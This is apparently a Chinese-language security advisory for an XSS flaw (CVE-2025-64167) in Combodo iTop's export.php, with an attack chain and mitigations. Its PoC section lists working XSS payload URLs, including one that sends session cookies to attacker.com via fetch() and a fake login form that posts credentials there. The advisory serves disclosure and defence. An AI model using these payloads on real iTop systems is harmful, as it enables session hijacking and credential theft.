CVE-2025-64167: Combodo iTop跨站脚本漏洞（XSS）

漏洞信息

漏洞编号

CVE-2025-64167

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Combodo iTop

漏洞概述

Combodo iTop是一款基于Web的IT服务管理工具，广泛用于企业的服务台管理、变更管理、配置管理等领域。该工具为IT运维团队提供了流程化和自动化的管理能力。然而，在2.7.13和3.2.2之前的版本中，iTop存在一处严重的跨站脚本（Cross-Site Scripting，XSS）安全漏洞。攻击者可以通过在URL参数中注入恶意脚本代码，当其他用户访问包含恶意链接的页面时，会在用户浏览器中执行任意JavaScript代码。此漏洞无需认证即可利用，但需要诱导用户点击恶意构造的链接。由于iTop通常部署在企业内部网络并处理敏感的配置和变更数据，攻击者利用此漏洞可窃取用户会话Cookie、劫持用户账户、读取敏感配置信息，甚至在内网环境中进一步横向移动。官方已在2.7.13和3.2.2版本中通过弃用export.php并启用新的export-v2.php接口完成了漏洞修复。

技术细节

该漏洞存在于Combodo iTop的export.php模块中，具体问题是在处理用户输入的URL参数时未对特殊字符进行充分的输入验证和输出编码。当用户通过GET请求访问export.php页面并在URL中携带恶意构造的参数值时（如包含<script>alert(1)</script>等JavaScript代码），这些未经过滤的数据会被直接嵌入到返回的HTML页面中。由于浏览器会将页面内容解析为HTML和JavaScript，嵌入的恶意脚本代码将被执行。攻击者利用此漏洞可窃取受害者的会话令牌、模拟用户操作、读取页面中显示的敏感IT配置数据。官方修复方案是将export.php标记为弃用，并使用新的export-v2.php接口替代，新接口对所有用户输入实施了严格的输入验证和安全编码机制。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标网站使用的Combodo iTop版本，确认版本号小于2.7.13或3.2.2

STEP 2

2

构造恶意链接：攻击者精心构造包含XSS payload的export.php URL参数，如expression=<script>恶意代码</script>

STEP 3

3

社工传播：攻击者通过邮件、即时通讯或钓鱼网站诱导目标用户点击恶意构造的链接

STEP 4

4

触发执行：目标用户浏览器访问恶意URL，iTop的export.php将未过滤的用户输入嵌入到响应HTML中

STEP 5

5

脚本执行：用户浏览器解析HTML时，恶意JavaScript代码被当作合法脚本执行，可窃取Cookie、会话令牌或执行其他恶意操作

STEP 6

6

权限提升：攻击者利用窃取的凭证冒充合法用户访问iTop系统，查看敏感配置数据或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64167 XSS PoC -->
<!-- 攻击者构造恶意URL诱导用户访问 -->

<!-- 基本XSS测试 -->
https://target-itop.com/pages/export.php?expression=<script>alert(document.cookie)</script>

<!-- 绕过过滤的XSS变体 -->
https://target-itop.com/pages/export.php?expression=<img src=x onerror=alert(1)>
https://target-itop.com/pages/export.php?expression=<svg onload=alert(document.domain)>
https://target-itop.com/pages/export.php?expression=<body onload=alert(/XSS/)>

<!-- 窃取会话Cookie的完整PoC -->
<!-- 攻击者首先搭建接收Cookie的恶意服务器，然后构造如下链接 -->
https://target-itop.com/pages/export.php?expression=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- 钓鱼攻击变体 - 伪造登录表单 -->
https://target-itop.com/pages/export.php?expression=<form action=https://attacker.com/phish><input name=username><input name=password></form>

影响范围

Combodo iTop < 2.7.13

Combodo iTop < 3.2.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）在Web服务器（如Nginx/Apache）配置URL参数过滤规则，拦截包含<script>、<img>、<svg>等XSS特征的请求；2）启用HttpOnly和Secure标志的Cookie配置，防止JavaScript访问会话Cookie；3）实施严格的Content-Security-Policy，禁用内联脚本执行；4）限制export.php页面的访问权限，仅允许授权IP访问；5）监控Web日志中的异常请求模式，及时发现潜在的攻击尝试。